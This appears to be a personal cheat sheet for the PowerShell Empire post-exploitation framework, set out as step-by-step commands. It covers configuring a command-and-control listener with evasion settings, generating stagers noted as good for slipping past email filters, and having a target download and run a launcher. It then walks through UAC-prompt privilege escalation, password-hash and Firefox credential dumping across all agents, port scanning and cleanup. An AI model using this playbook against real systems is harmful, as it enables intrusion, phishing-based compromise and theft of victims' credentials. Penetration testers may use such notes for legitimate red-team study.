# PowerShell Empire ## Modules: * PowerBreach: Persistence * Posh-SecMod: Discovery * PowerSploit: CodeEx,Keylog,etc * PowerUp : privesc * PowerView : Enum, includes: "Find Interesting Files" ### Module Categories: * CodeEx * Coll * Exfil * Expl * Fun * Lateral ### More Module Categories: * Management: email/runas/hash * Persistence: tasksched/reg/script * Recon: Enum * SitAwareness: scan/netstat * Trollsploit: RickRoll fun ## Getting Started ``` Linux: cd /opt/empire/setup sudo ./reset.sh ..cleanup previous history Normal: sudo ./empire agents = sessions info = show options listeners = multihandler ``` ## Module ``` searchmodule privesc listeners ? ..help for listeners ``` ## Listener ``` uselistener .. uselistener http info DefaultJitter ..give us irregular checks(to hide) KillDate ..quit on date WorkingHours ..goes silent after time SlackChannel ..notifs in Slack set DefaultDelay 1 ..to make commands faster Set Host http://10.x.x.x:8080 set Port 8080 ..quirky but helps to do both info ? ..help execute listener successfully started (like: multihandler) listeners ..view current listeners .. note: could rename from 'http' ``` ## Stager ``` back usestager .. .. windows/hta ..good to get past email filters .. windows/macro ..good to use in Word use stager windows/launcher_bat info set Listener http ..choose our current generate ..created /tmp/launcher.bat --------------------------------------------------------------- --------------------------------------------------------------- Share with Python: python3 -m http.server --------------------------------------------------------------- --------------------------------------------------------------- Windows/Target Download with: Windows Powershell: PS> cd .\Desktop\ PS> wget http://x.x.x.x:8000/launcher.bat -OutFile launcher.bat PS> dir PS> notepad ./launcher.bat Desktop > Db-Click Launcher.bat ``` ## Connected ``` Linux: Empire now shows connected!! agents interact ABC123SESS rename Agent1 info ..hostname, user, process, etc list listeners list agents ``` ## Doing more ``` usemodule usemodule situational_awareness/host/winenum .. also cool: collection/FoxDump ..firefox cred dump searchmodule powerup usemodule /privesc/powerup/allchecks .. Found Unquoted service paths .. Exe has poor perms .. Some false-positives ``` ## Elevated Modules ``` back usemodule powershell/credentials/powerdump* * means we need higher creds info run ..error, needs to run in elevated ``` ## PrivEsc Modules ``` back usemodule privesc/ask ..will prompt user to accept .. Unless UAC is set to allow everything set Listener http run agents .. we now have * higher priv agent rename 8VDM9S2G AgentHIGH ``` ## Powerdump ``` interact AgentHIGH usemodule credentials/powerdump* password-hashes!! back shell ipconfig shell whoami ``` ## Portscan ``` searchmodule portscan usemodule situational_awareness/network/portscan info set Hosts 10.x.x.x run ``` ## All Agents - Powerful ``` usemodule powershell/credentials/powerdump info set Agent all ..to run on ALL agents execute ``` ## Cleanup ``` agents kill all listeners kill http exit cd /opt/empire/downloads/ cd AgentHIGH less agent.log ..LOG of everything and outputs !!!! cd /opt/empire/setup sudo ./reset.sh ..cleanup previous history ```